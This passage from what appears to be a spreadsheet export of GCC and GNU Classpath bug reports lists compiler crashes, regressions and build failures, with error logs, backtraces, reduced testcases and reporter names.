gcc version 4.1.0 20051104 (experimental)
gcc version 4.1.0 20051110 (experimental)
OK with:
gcc version 3.4.4 [FreeBSD] 20050518 (system compiler)
gcc version 3.4.4 20050513 (prerelease)
gcc version 3.5.0 20040712 (experimental)
gcc version 4.0.2</t>
  </si>
  <si>
    <t>GCC-30152</t>
  </si>
  <si>
    <t>[4.3 Regression] bootstrap of trunk broken on Solaris x86 - varasm.c</t>
  </si>
  <si>
    <t>bootstrap of trunk broken on Solaris x86 as of 12/8/06 I believe.  It looks like varasm.c is giving warnings:
/u01/var/tmp/gcc_trunk_svn/gcc_20061211/./prev-gcc/xgcc -B/u01/var/tmp/gcc_trunk_svn/gcc_20061211/./prev-gcc/ -B/opt/gcc-4.3/i386-pc-solaris2.10/bin/ -c   -g -O2 -DIN_GCC   -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -pedantic -Wno-long-long -Wno-variadic-macros -Wno-overlength-strings -Wold-style-definition -Wmissing-format-attribute -Werror -fno-common   -DHAVE_CONFIG_H -I. -I. -I/u01/var/tmp/gcc_trunk_svn/gcc/gcc -I/u01/var/tmp/gcc_trunk_svn/gcc/gcc/. -I/u01/var/tmp/gcc_trunk_svn/gcc/gcc/../include -I/u01/var/tmp/gcc_trunk_svn/gcc/gcc/../libcpp/include -I/usr/local/include -I/usr/local/include -I/u01/var/tmp/gcc_trunk_svn/gcc/gcc/../libdecnumber -I../libdecnumber    /u01/var/tmp/gcc_trunk_svn/gcc/gcc/varasm.c -o varasm.o
cc1: warnings being treated as errors
/u01/var/tmp/gcc_trunk_svn/gcc/gcc/varasm.c: In function 'elf_record_gcc_switches':
/u01/var/tmp/gcc_trunk_svn/gcc/gcc/varasm.c:6268: warning: format '%llu' expects type 'long long unsigned int' but argument 4 has type 'long int'
/u01/var/tmp/gcc_trunk_svn/gcc/gcc/varasm.c:6275: warning: format '%llu' expects type 'long long unsigned int' but argument 4 has type 'long int'
/u01/var/tmp/gcc_trunk_svn/gcc/gcc/varasm.c:6283: warning: format '%llu' expects type 'long long unsigned int' but argument 4 has type 'long int'
/u01/var/tmp/gcc_trunk_svn/gcc/gcc/varasm.c:6302: warning: format '%llu' expects type 'long long unsigned int' but argument 4 has type 'long int'
gmake[3]: *** [varasm.o] Error 1
gmake[3]: Leaving directory `/u01/var/tmp/gcc_trunk_svn/gcc_20061211/gcc'
gmake[2]: *** [all-stage2-gcc] Error 2
Brett</t>
  </si>
  <si>
    <t>GCC-29826</t>
  </si>
  <si>
    <t>__attribute__ dllimport makes optimization crash on cygwin</t>
  </si>
  <si>
    <t>the exact version of GCC is 4.1.1
the system type is i686-pc-cygwin
the options given when GCC was configured/built:
  --prefix=/tmp/local/unixutil/gcc-4.1.1
  --with-local-prefix=/usr/local/myCompanyName
  (myCompanyName is not the exact wording)
  (also there is a symlink /tmp/local/unixutil/gcc -&gt; gcc-4.1.1)
the complete command line that triggers the bug:
  /tmp/local/unixutil/gcc/bin/gcc -O -Wall -Wextra -c zim.c
the compiler output (error messages warnings etc.):
  stdout: nothing
  stderr:
    zim.c: In function 'ffff':
    zim.c:16: error: unrecognizable insn:
    (insn 20 19 21 2 (set (reg:SI 66)
            (const:SI (plus:SI (mem:SI (symbol_ref:SI (#i.vvvv) ) [0 S4 A8])
                    (const_int 4 [0x4])))) -1 (nil)
        (nil))
    zim.c:16: internal compiler error: in extract_insn at recog.c:2084
    Please submit a full bug report
    with preprocessed source if appropriate.
    See  for instructions.
  zim.o: not created
the preprocessed file: see below
additional remarks:
  1) if -O is removed all seems OK
  2) if __attribute__((dllimport)) is removed all seems OK
  3) if -Wall or -Wextra is removed no change (still crash)
---zim.i-----------------------------------------------------
# 1 zim.c
# 1 
# 1 
# 1 zim.c
struct ssss {
  const char *xxxx1
  const char *xxxx2
}
extern __attribute__((dllimport)) struct ssss vvvv[]
int zzzz()
int ffff() {
  int i
  for (i = 0 i &lt; 2 i++) {
    zzzz(vvvv[i].xxxx2)
  }
  return(0)
}
-------------------------------------------------------------</t>
  </si>
  <si>
    <t>GCC-38135</t>
  </si>
  <si>
    <t>RESHAPE gives wrong result</t>
  </si>
  <si>
    <t>I expect that the following program prints:
    1    2    2
    2    1    2
    2    2    1
    1    0    0    0
which works with g95 and ifort but with gfortran one gets:
    1    1*****
   72    1    1
*****   72    1
    1    0    0    0
The program is a minutely modified version of the program posted to c.l.f by James Van Buskirk at
http://groups.google.com/group/comp.lang.fortran/browse_thread/thread/e7ec475ff7935804
integer parameter :: N = 3
integer A(NN)
A(1:N1:N)=reshape([integer::][NN]reshape([1][N+1][2]))
write(*'(3i5)') A
write(*'(4i5)') reshape([1][N+1][0])
end</t>
  </si>
  <si>
    <t>GCC-83675</t>
  </si>
  <si>
    <t>[8 regression] Many SPARC tests FAIL with unrecognizable insn</t>
  </si>
  <si>
    <t>Between 20180102 and 20180103 man SPARC tests started to FAIL like this:
FAIL: gcc.dg/vect/pr43842.c (internal compiler error)
FAIL: gcc.dg/vect/pr43842.c (test for excess errors)
/vol/gcc/src/hg/trunk/local/gcc/testsuite/gcc.dg/vect/pr43842.c: In function 'int161':
/vol/gcc/src/hg/trunk/local/gcc/testsuite/gcc.dg/vect/pr43842.c:40:1: error: unrecognizable insn:
(insn 28 27 29 5 (parallel [
            (set (reg:SI 131)
                (plus:SI (reg:SI 129)
                    (const_int 0 [0])))
            (set (zero_extract:DI (reg:DI 102 %gsr)
                    (const_int 32 [0x20])
                    (const_int 32 [0x20]))
                (zero_extend:DI (plus:SI (reg:SI 129)
                        (const_int 0 [0]))))
        ]) -1
     (nil))
during RTL pass: vregs
/vol/gcc/src/hg/trunk/local/gcc/testsuite/gcc.dg/vect/pr43842.c:40:1: internal compiler error: in extract_insn at recog.c:2304
0xa07177 _fatal_insn(char const* rtx_def const* char const* int char const*)
        /vol/gcc/src/hg/trunk/local/gcc/rtl-error.c:108
0xa071a7 _fatal_insn_not_found(rtx_def const* char const* int char const*)
        /vol/gcc/src/hg/trunk/local/gcc/rtl-error.c:116
0x9c8027 extract_insn(rtx_insn*)
        /vol/gcc/src/hg/trunk/local/gcc/recog.c:2304
0x72f38b instantiate_virtual_regs_in_insn
        /vol/gcc/src/hg/trunk/local/gcc/function.c:1646
0x72f38b instantiate_virtual_regs
        /vol/gcc/src/hg/trunk/local/gcc/function.c:1967
0x72f38b execute
        /vol/gcc/src/hg/trunk/local/gcc/function.c:2016
The failure can be reproduced with
$ cc1 -fpreprocessed pr43842.i -quiet -mcpu=ultrasparc -mvis -O2 -ftree-vectorize -o pr43842.s
A reghunt identified this patch as the culprit:
The first bad revision is:
changeset:   43046:975c3cdb3b00
user:        rsandifo@138bc75d-0d04-0410-961f-82ee72b054a4
date:        Tue Jan 02 18:26:27 2018 +0000
summary:     Remove vec_perm_const optab
2018-01-02  Richard Sandiford  
        * Makefile.in (OBJS): Add vec-perm-indices.o.
        * vec-perm-indices.h: New file.
        * vec-perm-indices.c: Likewise.
        * target.h (vec_perm_indices): Replace with a forward class
        declaration.
        (auto_vec_perm_indices): Move to vec-perm-indices.h.
[...]
  Rainer</t>
  </si>
  <si>
    <t>GCC-64728</t>
  </si>
  <si>
    <t>[5 Regression] internal compiler error: SSA corruption</t>
  </si>
  <si>
    <t>Created attachment 34528
preprocessed source
$ ./cc1 -quiet -O x.i -o /dev/null 
Unable to coalesce ssa_names 158 and 160 which are marked as MUST COALESCE.
start_position_158(ab) and  start_position_160(ab)
src/openslide-vendor-hamamatsu.c: In function â€˜read_from_jpegâ€™:
src/openslide-vendor-hamamatsu.c:599:11: internal compiler error: SSA corruption
0xe31965 fail_abnormal_edge_coalesce
	/home/marek/src/gcc/gcc/tree-ssa-coalesce.c:927
0xe32950 coalesce_partitions
	/home/marek/src/gcc/gcc/tree-ssa-coalesce.c:1225
0xe3301a coalesce_ssa_name()
	/home/marek/src/gcc/gcc/tree-ssa-coalesce.c:1370
0xdb8a08 remove_ssa_form
	/home/marek/src/gcc/gcc/tree-outof-ssa.c:1018
0xdb9318 rewrite_out_of_ssa(ssaexpand*)
	/home/marek/src/gcc/gcc/tree-outof-ssa.c:1252
0x7edd69 execute
	/home/marek/src/gcc/gcc/cfgexpand.c:5817
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-70229</t>
  </si>
  <si>
    <t>error: constexpr constructor does not have empty body</t>
  </si>
  <si>
    <t>$ cat x.cpp
#define _CONST_FUN constexpr
template&lt;class _Rep
         class _Period&gt;
        class duration
{ // represents a time duration                                                                                                                                     
public:
  typedef duration _Myt
  typedef _Rep rep
  typedef _Period period
  template&lt;class _Rep2
           class _Period2&gt;
  _CONST_FUN duration(int xx)
  { // construct from a duration                                                                                                                                    
        typedef int test
    static_assert(0 == 0
                  period not an instance of std::ratio)
  }
}
$ ./xgcc -c -std=c++11 x.cpp -B.
x.cpp: In constructor â€˜duration::duration(int)â€™:                  
x.cpp:21:3: error: constexpr constructor does not have empty body                   }                                                                             |
   ^    
$ ./xgcc -v
Using built-in specs.
COLLECT_GCC=./xgcc
Target: x86_64-pc-linux-gnu
Configured with: ../gcc/configure --enable-languages=cc++
Thread model: posix
gcc version 6.0.0 20160314 (experimental) (GCC)</t>
  </si>
  <si>
    <t>pangbw</t>
  </si>
  <si>
    <t>GCC-26477</t>
  </si>
  <si>
    <t>[4.2 Regression] bootstrap: SYS_gettid undeclared</t>
  </si>
  <si>
    <t>Bootstrap error with recent CVS:
alpha1:gcc-obj&gt;uname -a
Linux alpha1 2.4.9-40 #1 Mon Sep 23 08:14:02 EDT 2002 alpha unknown
alpha1:gcc-obj&gt;g++ --version
g++ (GCC) 4.2.0 20051124 (experimental)
Copyright (C) 2005 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
alpha1:gcc-obj&gt;alias CONFIGURECVS
alias CONFIGURECVS='../gcc/configure --verbose --enable-languages=c++ --disable-nls &gt;clog 2&gt;&amp;1 &amp;'
alpha1:gcc-obj&gt;alias BUILD
alias BUILD='nice gmake CFLAGS='\'''\'' BOOT_CFLAGS='\'''\'' LIBCFLAGS='\''-g'\'' LIBCXXFLAGS='\''-g'\'' bootstrap &gt;log 2&gt;&amp;1 &amp;'
../../../gcc/libgomp/config/linux/lock.c: In function 'gomp_tid':
../../../gcc/libgomp/config/linux/lock.c:104: error: 'SYS_gettid' undeclared (first use in this function)
../../../gcc/libgomp/config/linux/lock.c:104: error: (Each undeclared identifier is reported only once
../../../gcc/libgomp/config/linux/lock.c:104: error: for each function it appears in.)
gmake[4]: *** [lock.lo] Error 1
gmake[4]: Leaving directory `/usr/home/mckelvey/software/gcc-obj/alphaev56-unkno
wn-linux-gnu/libgomp'
gmake[3]: *** [all-recursive] Error 1
gmake[3]: Leaving directory `/usr/home/mckelvey/software/gcc-obj/alphaev56-unkno
wn-linux-gnu/libgomp'
gmake[2]: *** [all] Error 2
gmake[2]: Leaving directory `/usr/home/mckelvey/software/gcc-obj/alphaev56-unkno
wn-linux-gnu/libgomp'
gmake[1]: *** [all-target-libgomp] Error 2
gmake[1]: Leaving directory `/usr/home/mckelvey/software/gcc-obj'
gmake: *** [bootstrap] Error 2</t>
  </si>
  <si>
    <t>GCC-24311</t>
  </si>
  <si>
    <t>Regression: ICE when MERGE is used with character args in a PRINT/WRITE statement</t>
  </si>
  <si>
    <t>From the Meissner example Window (Ising model) this line
print '(  I6 64 A1)' L**3 Merge (+ - Ising(: 4 : 4 : 4)  == 1) 
causes
meissner10.f90: In function â€˜MAIN__â€™:
meissner10.f90:18: internal compiler error: in gfc_conv_expr_descriptor at fortran/trans-array.c:3815
The ICE is due to this patch: http://gcc.gnu.org/ml/gcc-cvs/2005-09/msg00961.html
I did not catch it because I had passed this patch by working on trans-io.c as it does. *sigh*
Specifically the call from trans-io.c(gfc_trans_transfer):
...snip
  else
    {
      /* Pass the array descriptor to the library.  */
      gfc_conv_expr_descriptor (
      tmp = gfc_build_addr_expr (NULL se.expr)
      transfer_array_desc (
    }
...snip
is the cause of the problem.
A potential patch (well it works!) is
*** gcc/gcc/fortran/trans-io.c.orig	Tue Oct 11 14:18:51 2005
--- gcc/gcc/fortran/trans-io.c	Tue Oct 11 14:18:31 2005
*************** gfc_trans_transfer (gfc_code * code)
*** 16371643 ****
        gfc_conv_expr_reference (
        transfer_expr (
      }
!   else if (expr-&gt;ts.type == BT_DERIVED)
      {
        /* Initialize the scalarizer.  */
        gfc_init_loopinfo (
--- 16371643 ----
        gfc_conv_expr_reference (
        transfer_expr (
      }
!   else if (expr-&gt;ts.type == BT_DERIVED || (expr-&gt;ts.type == BT_CHARACTER &amp;&amp; expr-&gt;ts.cl == NULL))
      {
        /* Initialize the scalarizer.  */
        gfc_init_loopinfo (
I am looking for a more elegant solution or at least a cleaner detection of the error.</t>
  </si>
  <si>
    <t>GCC-44587</t>
  </si>
  <si>
    <t>[4.4/4.5/4.6 Regression] ICE in instantiate_decl</t>
  </si>
  <si>
    <t>template  struct A { }
template  struct B { static const char c[1] typedef A::c&gt; C }
ICEs in instantiate_decl.
template  struct A { }
template  struct B { static const int c typedef A::c&gt; C }
template  const int B c = sizeof (T)
ICEs too while e.g.
template  struct A { }
template  struct B { static const int c = sizeof (T) typedef A::c&gt; C }
does not.</t>
  </si>
  <si>
    <t>GCC-23326</t>
  </si>
  <si>
    <t>[4.0 Regression] Wrong code from forwprop</t>
  </si>
  <si>
    <t>The following testcase reduced from Kopete is miscompiled at -O2
struct Bar { bool is() const int status() const }
void foobar(void)
void foobar2(void)
void Foo(const Bar&amp; x const Bar&amp; y)
{
  const bool wasOffline = !x.is()
  const bool isOffline = !y.is()
  if (wasOffline || y.status() == 10)
    foobar()
  if (wasOffline != isOffline)
    foobar2()
}
.t23.mergephi:
:
  D.1589_3 = is (x_2)
  wasOffline_4 = !D.1589_3
  D.1590_6 = is (y_5)
  isOffline_7 = !D.1590_6
  if (wasOffline_4) goto  else goto 
:
  D.1596_10 = status (y_5)
  if (D.1596_10 == 10) goto  else goto 
:
  foobar ()
:
  if (wasOffline_4 != isOffline_7) goto  else goto 
:
  foobar2 ()
:
  return
.t24.forwprop:
:
  D.1589_3 = is (x_2)
  D.1590_6 = is (y_5)
  isOffline_7 = !D.1590_6
  if (D.1589_3 == 0) goto  else goto 
:
  D.1596_10 = status (y_5)
  if (D.1596_10 == 10) goto  else goto 
:
  foobar ()
:
  if (D.1589_3 != 0) goto  else goto 
:
  foobar2 ()
:
  return
note that the comparison preceding foobar2() is hosed now
we even don't use isOffline or D.1590 anymore.</t>
  </si>
  <si>
    <t>GCC-23935</t>
  </si>
  <si>
    <t>$PREFIX/include/ffi.h needs to go to a target- and -version-dependent location</t>
  </si>
  <si>
    <t>Currently ffi.h is installed into $PREFIX/include. 
This breaks cases where different versions of GCC or copies of GCC for 
different targets are installed into the same $PREFIX.</t>
  </si>
  <si>
    <t>GCC-5848</t>
  </si>
  <si>
    <t>gcj crashes on syntax with complex cast</t>
  </si>
  <si>
    <t>This code does not compile on gcj (but work on J2DK/Jikes)
----------------- snip (x.java) ------------------------------------------
import java.util.Vector
import java.util.Enumeration
public class x
{
    private Vector data
    void sub()
    {
	long sz = 0
        for (Enumeration e = data.elements()  e.hasMoreElements() ) {
	    sz =+ ((byte[])e.nextElement()).length
	}
    }
}
----------------- snip (gcj output)---------------------------------------
bash-2.05a$ gcc -c x.java 
x.java: In class `x':
x.java: In method `x.sub()':
x.java:11: tree check: expected expr_with_file_location have convert_expr in qualify_ambiguous_name at ./java/parse.y:11300
Var vÃ¤nlig och skicka in en komplett felrapport
om mÃ¶jligt med preprocessad kÃ¤llfil.
Se  fÃ¶r instruktioner.
----------------- snip ---------------------------------------------------
Release:
3.2 20020305 (experimental)
Environment:
System: Linux cm-linux.lla.sema.se 2.4.17 #8 mÃ¥n feb 18 17:25:46 CET 2002 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ./configure i686-pc-linux-gnu --prefix=/usr/local/gcc --enable-threads --enable-languages=c++java
How-To-Repeat:
Just compile the snippet above</t>
  </si>
  <si>
    <t>goran</t>
  </si>
  <si>
    <t>GCC-27287</t>
  </si>
  <si>
    <t>[4.1 Regression] returning constant double</t>
  </si>
  <si>
    <t>gcc -O2 -mcpu=8548 -mfloat-gprs=double -c x.c
double f (void) { return 0 }
gcc crashes with an inrecognizable insn.</t>
  </si>
  <si>
    <t>eliot</t>
  </si>
  <si>
    <t>CLASSPATH-27185</t>
  </si>
  <si>
    <t>JComponent.paintChildrenOptimized does not always returns the correct last child to be painted.</t>
  </si>
  <si>
    <t>Our swing demo currently only paints the first button in the last row do not displaying others. This is because it starts painting from the wrong component (JButton) and proceeds downwards till the first button. The bug can be fully fixed by deleting lines 2030 to 2049 in JComponent that seem doing some kind of the optimization not very correctly. The optimization should be either removed or fixed.
The First button only in the last row depends on the call of the setMaximumSize in the Swing demo but this call is accepted and operates correctly in the Sun's jre. So we probably need to fix the Swing and not the demo program.
Setting severty to major - buttons are not visible.</t>
  </si>
  <si>
    <t>GCC-27795</t>
  </si>
  <si>
    <t>[4.1 Regression] optimizer produces faulty code [tree-vrp]</t>
  </si>
  <si>
    <t>The attached (simple) piece of code segfaults if compiled with (&gt;=)-O2.
There are several possibilities to trigger the error.
1. Using the attached cpp compile with -O2 ends in segfault when running the app (-O{01} is fine)
2. If the cout in the last line is removed everything seems to be fine
3. If line 16 is exchanged with line 15 everything is fine too.
(tested on gentoo and SuSE)
Output of g++ -v -save-temps -O2 compilerbugCPP.cpp -o compilerbug:
Using built-in specs.
Target: i586-suse-linux
Configured with: ../configure --enable-threads=posix --prefix=/usr --with-local-prefix=/usr/local --infodir=/usr/share/info --mandir=/usr/share/man --libdir=/usr/lib --libexecdir=/usr/lib --enable-languages=cc++objcfortranjavaada --enable-checking=release --with-gxx-include-dir=/usr/include/c++/4.1.0 --enable-ssp --disable-libssp --enable-java-awt=gtk --enable-gtk-cairo --disable-libjava-multilib --with-slibdir=/lib --with-system-zlib --enable-shared --enable-__cxa_atexit --enable-libstdcxx-allocator=new --without-system-libunwind --with-cpu=generic --host=i586-suse-linux
Thread model: posix
gcc version 4.1.0 (SUSE Linux)
 /usr/lib/gcc/i586-suse-linux/4.1.0/cc1plus -E -quiet -v -D_GNU_SOURCE compilerbugCPP.cpp -mtune=generic -O2 -fpch-preprocess -o compilerbugCPP.ii
#include ... search starts here:
#include  search starts here:
 /usr/include/c++/4.1.0
 /usr/include/c++/4.1.0/i586-suse-linux
 /usr/include/c++/4.1.0/backward
 /usr/local/include
 /usr/lib/gcc/i586-suse-linux/4.1.0/include
 /usr/lib/gcc/i586-suse-linux/4.1.0/../../../../i586-suse-linux/include
 /usr/include
End of search list.
 /usr/lib/gcc/i586-suse-linux/4.1.0/cc1plus -fpreprocessed compilerbugCPP.ii -quiet -dumpbase compilerbugCPP.cpp -mtune=generic -auxbase compilerbugCPP -O2 -version -o compilerbugCPP.s
GNU C++ version 4.1.0 (SUSE Linux) (i586-suse-linux)
        compiled by GNU C version 4.1.0 (SUSE Linux).
GGC heuristics: --param ggc-min-expand=99 --param ggc-min-heapsize=129317
Compiler executable checksum: c877835e2478fb620b785c23d7318e1f
 /usr/lib/gcc/i586-suse-linux/4.1.0/../../../../i586-suse-linux/bin/as -V -Qy -o compilerbugCPP.o compilerbugCPP.s
GNU assembler version 2.16.91.0.5 (i586-suse-linux) using BFD version 2.16.91.0.5 20051219 (SUSE Linux)
 /usr/lib/gcc/i586-suse-linux/4.1.0/collect2 --eh-frame-hdr -m elf_i386 -dynamic-linker /lib/ld-linux.so.2 -o compilerbug /usr/lib/gcc/i586-suse-linux/4.1.0/../../../crt1.o /usr/lib/gcc/i586-suse-linux/4.1.0/../../../crti.o /usr/lib/gcc/i586-suse-linux/4.1.0/crtbegin.o -L/usr/lib/gcc/i586-suse-linux/4.1.0 -L/usr/lib/gcc/i586-suse-linux/4.1.0 -L/usr/lib/gcc/i586-suse-linux/4.1.0/../../../../i586-suse-linux/lib -L/usr/lib/gcc/i586-suse-linux/4.1.0/../../.. compilerbugCPP.o -lstdc++ -lm -lgcc_s -lgcc -lc -lgcc_s -lgcc /usr/lib/gcc/i586-suse-linux/4.1.0/crtend.o /usr/lib/gcc/i586-suse-linux/4.1.0/../../../crtn.o</t>
  </si>
  <si>
    <t>S.Diederich</t>
  </si>
  <si>
    <t>GCC-13873</t>
  </si>
  <si>
    <t>gcc/longlong.h uses test for PPC</t>
  </si>
  <si>
    <t>PPC is much too generic a define for testing to see if it is a PowerPC target. 
This is found to complicate things with a vxWorks target other than PowerPC. For
vxWorks PPC is defined (along with many other CPUs) all the time - regardless
of the target CPU type.
There are two tests for PPC.  They should be modified or removed.</t>
  </si>
  <si>
    <t>GCC-63747</t>
  </si>
  <si>
    <t>[5 regression] icf mis-compares switch gimple</t>
  </si>
  <si>
    <t>ARM -Os bootstrap breaks. Root cause lies in ipa-icf-gimple.c where compare_gimple_switch doesn't compare case numbers correctly. Will upload a reduced test case soon.</t>
  </si>
  <si>
    <t>GCC-60981</t>
  </si>
  <si>
    <t>lto-plugin configuration doesn't test for -static-libgcc (OSX gcc -&gt; clang)</t>
  </si>
  <si>
    <t>Created attachment 32690
lto-plugin -static-libgcc configure.ac test
Hi
When building on OSX gcc is a symlink to clang and doesn't accept the -static-libgcc option.
The attached patch basically copies the have_static_libs test from the top level configure.ac:1253 to the lto-plugin/configure.ac (removing the c++ parts) - it hasn't been tested as I don't have the right version of autoconf but copying and modifying the corresponding section from configure works.
Cheers
Tony</t>
  </si>
  <si>
    <t>tony.theodore</t>
  </si>
  <si>
    <t>GCC-8478</t>
  </si>
  <si>
    <t>c/c++ error</t>
  </si>
  <si>
    <t xml:space="preserve"> I tried to compile a simple Program (wc.cpp) on a AIX 4.3.3 Server with =
 the GCC 3.2:
 	gcc wc.cpp -lc -lstdc++
 These are the errors i=B4m getting:
 	ld: 0711-317 ERROR: Undefined symbol: .std::basic_string&lt;wchar_t =
 std::char_traits std::allocator =
 &gt;::basic_string[in-charge](wchar_t const* std::allocator =
 const&amp;)
 	ld: 0711-317 ERROR: Undefined symbol: .std::basic_string&lt;wchar_t =
 std::char_traits std::allocator &gt;::c_str() const
 	ld: 0711-317 ERROR: Undefined symbol: .std::basic_string&lt;wchar_t =
 std::char_traits std::allocator &gt;::~basic_string =
 [in-charge]()
 	ld: 0711-345 Use the -bloadmap or -bnoquiet option to obtain more =
 information.
 	collect2: ld returned 8 exit status
 First i thought these errors are because _GLIB_CPP_USE_WCHAR_T was not =
 defined.
 So i defined _GLIB_CPP_USE_WCHAR_T and rebuilt the compiler but i have =
 still the same errors.
 Maybe you know how i can avoid the problem?
 yours sincerely
 -----------------------------------------------------
 Ren=E9 Wutschitz
 Invaris Informationssysteme GmbH
 Invariscenter=20
 7000 Eisenstadt
 Tel.: 02682 / 64000 - 534
 mailto:Rene.Wutschitz@Invaris.com
 -----------------------------------------------------
Release:
unknown</t>
  </si>
  <si>
    <t>rene.wutschitz</t>
  </si>
  <si>
    <t>GCC-18471</t>
  </si>
  <si>
    <t>[4.0 regression] ICE on invalid template class</t>
  </si>
  <si>
    <t>The following invalid code causes an ICE on mainline:
=============================
typedef int X
template struct X {}
=============================
bug.cc:2: error: 'template &gt; struct X' redeclared as different
kind of symbol
bug.cc:1: error: previous declaration of 'typedef int X'
bug.cc:2: internal compiler error: tree check: expected class 'declaration'
have 'exceptional' (error_mark) in push_template_decl_real at cp/pt.c:3152
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-52888</t>
  </si>
  <si>
    <t>Unable to inline function pointer call with inexact signature match</t>
  </si>
  <si>
    <t>#include 
struct A {
    template 
    static inline __attribute__((always_inline))
    void Caller (T* pn void (T::*pm)(void))
        { (pn-&gt;*pm)() }
    void Call (int i) {
        if (i == 1) Caller(this 
        else if (i == 2) Caller(this 
    }
    inline void Func1 (void)            { puts (Func1) }
    inline void Func2 (void) noexcept   { puts (Func2) }
}
int main (void) { A a a.Call(1) a.Call(2) return (0) }
-------------------------------------------------------------
Compiling with: g++ (GCC) 4.7.0 20120324 (prerelease) x86_64
&gt; g++ -O -std=c++11 a.cc
a.cc: In function 'int main()':
a.cc:5:55: error: inlining failed in call to always_inline 'static void A::Caller(T* void (T::*)()) [with T = A]': mismatched arguments
a.cc:10:42: error: called from here
a.cc:5:55: error: inlining failed in call to always_inline 'static void A::Caller(T* void (T::*)()) [with T = A]': mismatched arguments
a.cc:10:42: error: called from here
-------------------------------------------------------------
I'm using always_inline to force the error without it Caller is not inlined errorlessly.
The problem occurs when the function pointer has an inexact signature match to the pointed function. In the above example Func2 has a noexcept tacked on to it. In more complex examples involving pointer to function with arguments using a typedef of an object in argument list results in this error while using the actual object works (typedef A a_t void good(A void bad(a_t&amp;)). So the compiler is able to explicitly convert an inexact match like &amp;A::Func2 to void(A::*)(void) when instantiating the template but the inliner is not able to make the same match even though it should have the same information.</t>
  </si>
  <si>
    <t>msharov</t>
  </si>
  <si>
    <t>GCC-77901</t>
  </si>
  <si>
    <t>ICE in tree-sse-reassocc:2881</t>
  </si>
  <si>
    <t>build of gdb-7.11.1 with gcc Revision: 240867 fails with ICE
last week it was OK.
../../gdb-7.11.1/gdb/coffread.c: In function 'decode_type':
../../gdb-7.11.1/gdb/coffread.c:1816:1: internal compiler error: tree check: expected ssa_name have bit_and_expr in optimize_range_tests_var_bound at tree-ssa-reassoc.c:2881
 decode_type (struct coff_symbol *cs unsigned int c_type
 ^~~~~~~~~~~
0xe1d73c tree_check_failed(tree_node const* char const* int char const* ...)
	../../gcc-trunk/gcc/tree.c:9743
0xd371b1 tree_check(tree_node* char const* int char const* tree_code)
	../../gcc-trunk/gcc/tree.h:3031
0xd371b1 optimize_range_tests_var_bound
	../../gcc-trunk/gcc/tree-ssa-reassoc.c:2881
0xd371b1 optimize_range_tests
	../../gcc-trunk/gcc/tree-ssa-reassoc.c:3113
0xd38c7f reassociate_bb
	../../gcc-trunk/gcc/tree-ssa-reassoc.c:5604
0xd38aad reassociate_bb
	../../gcc-trunk/gcc/tree-ssa-reassoc.c:5723
0xd38aad reassociate_bb
	../../gcc-trunk/gcc/tree-ssa-reassoc.c:5723
0xd3b3b9 do_reassoc
	../../gcc-trunk/gcc/tree-ssa-reassoc.c:5837
0xd3b3b9 execute_reassoc
	../../gcc-trunk/gcc/tree-ssa-reassoc.c:5924
0xd3b3b9 execute
	../../gcc-trunk/gcc/tree-ssa-reassoc.c:5963
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
make[2]: *** [coffread.o] Error 1
make[2]: Leaving directory `/home/ed/gnu/gdb-build/gdb'
make[1]: *** [all-gdb] Error 2
make[1]: Leaving directory `/home/ed/gnu/gdb-build'
make: *** [all] Error 2</t>
  </si>
  <si>
    <t>GCC-35944</t>
  </si>
  <si>
    <t>[4.3 Regression] wrong result for MOD with kind=10 for some array argument values</t>
  </si>
  <si>
    <t>The following program gives the wrong answers when the 
MOD arguments have kind = 10 and one is an array.  It
works when the kind is 4 or 8.
      program FA2083
! fails on Windows XP
! gcc version 4.4.0 20080312 (experimental) [trunk revision 133139]
      implicit none
      integer j1k
      parameter (k=10)              !fails
!      parameter (k=8)              !works
!      parameter (k=4)              !works
      REAL(k) QDA1(10)
      REAL(k) QDA(10) qval
      print * 'kind = 'k
      qda = (/ 12345678910 /)
      QDA1 = MOD ( 1.1_k*( QDA(1) -5.0_k) P=( QDA -2.5_k))
      DO J1 = 110
      QVAL = MOD(1.1_k*(QDA(1)-5.0_k)P=(QDA(J1)-2.5_k))
      print '(i3 3f10.2)' j1 qda1(j1) qval qval-qda1(j1)
      ENDDO
      END
c:\gfortran:gfortran fa2083.f
c:\gfortran:a
 kind =           10
  1     -1.40     -1.40      0.00
  2     -0.40     -0.40      0.00
  3     -0.40     -0.40      0.00
  4     -0.40     -1.40     -1.00
  5     -0.40     -1.90     -1.50
  6     -0.40     -0.90     -0.50
  7     -0.40     -4.40     -4.00
  8     -0.40     -4.40     -4.00
  9     -0.40     -4.40     -4.00
 10     -0.40     -4.40     -4.00
c:\gfortran:gfortran fa2083.f
c:\gfortran:a
 kind =            8
  1     -1.40     -1.40      0.00
  2     -0.40     -0.40      0.00
  3     -0.40     -0.40      0.00
  4     -1.40     -1.40      0.00
  5     -1.90     -1.90      0.00
  6     -0.90     -0.90      0.00
  7     -4.40     -4.40      0.00
  8     -4.40     -4.40      0.00
  9     -4.40     -4.40      0.00
 10     -4.40     -4.40      0.00
c:\gfortran:gfortran fa2083.f
c:\gfortran:a
 kind =            4
  1     -1.40     -1.40      0.00
  2     -0.40     -0.40      0.00
  3     -0.40     -0.40      0.00
  4     -1.40     -1.40      0.00
  5     -1.90     -1.90      0.00
  6     -0.90     -0.90      0.00
  7     -4.40     -4.40      0.00
  8     -4.40     -4.40      0.00
  9     -4.40     -4.40      0.00
 10     -4.40     -4.40      0.00</t>
  </si>
  <si>
    <t>GCC-45136</t>
  </si>
  <si>
    <t>-fcompare-debug failure with -Os -fschedule-insns</t>
  </si>
  <si>
    <t>Output:
$ gcc -Os -fschedule-insns -fcompare-debug testcase.c
gcc: error: testcase.c: -fcompare-debug failure
Tested revisions:
r162653 - fail
r161170 - fail
r153685 - fail</t>
  </si>
  <si>
    <t>CLASSPATH-23900</t>
  </si>
  <si>
    <t>JFrame doesn't recognize changes in it's ContentPane</t>
  </si>
  <si>
    <t>Run the testcase below.  Clicking on the minimize or close buttons should do as
you expect but nothing shows up unless you resize (enlarge) the JFrame.
